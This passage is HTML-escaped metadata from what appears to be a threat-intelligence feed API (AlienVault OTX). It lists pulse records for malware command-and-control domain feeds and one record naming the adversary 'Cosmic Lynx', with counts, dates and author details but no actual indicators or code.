sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'domain',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;95,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_78495/resized/80/avatar_ba5a8acdbd.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'78495',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'otxrobottwo'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-02-10T07:12:56.255000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Command&nbsp;and&nbsp;Control&nbsp;domains&nbsp;for&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Malware.&nbsp;These&nbsp;domains&nbsp;are&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'extracted&nbsp;from&nbsp;a&nbsp;number&nbsp;of&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'sources,&nbsp;and&nbsp;are&nbsp;suspicious.',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5e4102789c1c8aec95a65738',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;1898,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'URL':&nbsp;25,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'domain':&nbsp;1408,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'hostname':&nbsp;465},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-07-20T01:55:39.683000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'16&nbsp;hours&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'Malware&nbsp;-&nbsp;Malware&nbsp;Domain&nbsp;Feed&nbsp;V2&nbsp;-&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'February&nbsp;10&nbsp;2020',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'domain',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;265,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'white',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'Cosmic&nbsp;Lynx',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_24260/resized/80/avatar_7b67627076.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'24260',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'Cyber_Hat'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;'5f04d03c68918d97811bda03',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-07-08T09:48:12.031000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;8,<br>&nbsp;&nbsp;&nbsp;&nbsp;